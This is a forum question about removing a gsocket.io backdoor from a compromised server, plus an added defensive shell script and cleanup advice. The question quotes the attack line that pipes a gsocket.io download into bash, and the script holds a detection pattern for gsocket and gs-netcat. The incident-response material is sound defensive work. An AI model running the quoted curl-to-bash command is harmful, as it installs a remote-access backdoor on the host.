30 Oct
Removing Gsocket.io connection from server
My customer's server has been compromised. They are running this script from a PHP script:
bash -c "$(curl -fsSL https://gsocket.io/x)"
and I have several folders in /tmp, as below:
-rw------- 1 *** *** 153310 Sep 30 12:07 phpb0wrlJ
-rw------- 1 *** *** 65536 Sep 29 13:50 phpc29KRO
-rw------- 1 *** *** 40960 Sep 30 12:43 phpdrvPac
-rw------- 1 *** *** 49152 Sep 29 14:30 phpOWdcZw
That is really suspicious. I have:
- Checked for new users or unauthorized changes in the /etc/passwd and /etc/shadow files.
- Analyzed network connections with commands like netstat -tulnp or ss -tuln, looking for unfamiliar listening services or connections.
- Examined running processes with ps aux to identify suspicious scripts or binaries.
- Reviewed log files in /var/log, specifically auth.log, syslog, or messages, for any unauthorized logins, sudo usage, or other unusual activity.
- Searched for unfamiliar files in critical directories, such as /tmp, /var/tmp, /home, /etc, or any binary directories like /usr/local/bin.
My question: how do I remove the gsocket access from my server?
Thank you in advance.
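Added example (editor's code, not the poster's): POSIX shell helpers that turn the checks listed in the question into something repeatable, with two caveats a responder should know. First, gs-netcat (the binary the gsocket.io/x deploy script installs) dials out to a relay rather than opening a listening port, so a listening-only view such as ss -tuln can miss it; look at established outbound connections (ss -tunap) and at which processes own them. Second, files named php followed by six random characters in /tmp are the naming pattern PHP itself uses for upload temporaries, so their names alone do not prove a webshell; their contents and timestamps do. The regex, the list of startup/cron locations, the scratch directories and the --live switch are assumptions; the only offline-testable parts are the grep and find helpers, which the usage note exercises on constructed files.

```shell
#!/bin/sh
# Added triage helpers for the checks listed in the question (not the poster's
# code). The pattern, the persistence paths and the --live switch are assumptions.

# Strings a gsocket deployment leaves behind: the deploy URL quoted in the
# question and the gs-netcat binary that the deploy script installs.
GS_PATTERN='gsocket\.io|gs-netcat'

# Print "file:line:text" for every line in the given files matching GS_PATTERN.
# Unreadable or missing files are skipped. Returns 0 if anything matched.
find_gs_refs() {
    hits=0
    for f in "$@"; do
        [ -r "$f" ] || continue
        if grep -HnE "$GS_PATTERN" "$f"; then
            hits=1
        fi
    done
    [ "$hits" -eq 1 ]
}

# Persistence spots a shell running as the web user can usually write to:
# the user's shell startup files and crontab, plus system cron locations
# (assumed list). Argument: home directory of the account to inspect.
scan_persistence() {
    home="$1"
    find_gs_refs "$home/.profile" "$home/.bashrc" "$home/.bash_profile" \
        "$home/.bash_login" "$home/.zshrc" /etc/rc.local /etc/crontab \
        /etc/cron.d/* /var/spool/cron/crontabs/* /var/spool/cron/*
}

# Regular files under a scratch directory modified within the last N days,
# with owner and timestamp, so staged droppers stand out next to the
# php* upload temporaries the question shows.
recent_tmp_files() {
    find "$1" -xdev -type f -mtime -"$2" -exec ls -l {} +
}

# Same selection as a plain count, for scripting and for the check below.
count_recent_tmp_files() {
    find "$1" -xdev -type f -mtime -"$2" | wc -l | tr -d ' '
}

# Processes whose executable lives in a world-writable scratch directory or
# has already been deleted from disk: typical of a dropper run out of /tmp.
# Linux only (reads /proc). Prints "pid exe-target".
procs_running_from_tmp() {
    for exe in /proc/[0-9]*/exe; do
        target=$(readlink "$exe" 2>/dev/null) || continue
        case "$target" in
            /tmp/*|/var/tmp/*|/dev/shm/*|*' (deleted)')
                pid=${exe#/proc/}; pid=${pid%/exe}
                printf '%s %s\n' "$pid" "$target" ;;
        esac
    done
}

# Live view of the host. Sockets are shown with -a and -p on purpose: an
# outbound relay connection is not a listener, and you want the owning PID.
live_checks() {
    echo "== persistence references =="
    scan_persistence "${HOME:-/root}" || echo "(none found)"
    echo "== processes started from scratch dirs or with deleted binaries =="
    procs_running_from_tmp
    echo "== processes mentioning gsocket/gs-netcat =="
    ps axo pid,user,etime,args | grep -E "$GS_PATTERN" | grep -v grep
    echo "== sockets (listening and established, with owning process) =="
    if command -v ss >/dev/null 2>&1; then ss -tunap; else netstat -tunap; fi
    echo "== files in scratch dirs modified in the last 7 days =="
    for d in /tmp /var/tmp /dev/shm; do
        if [ -d "$d" ]; then recent_tmp_files "$d" 7; fi
    done
}

if [ "${1-}" = "--live" ]; then
    live_checks
fi
```

Run it as root with --live on the compromised host (from a read-only copy of the script, not by piping anything from the network). Whatever it finds is what removal consists of: kill the process that owns the outbound connection, delete the binary it points to, and strip the matching lines from every startup file and crontab the scan reports, then rerun the live view to confirm nothing reconnects. Treat the PHP entry point that launched the curl line as the real fix; deleting the implant without closing that hole only invites a reinstall.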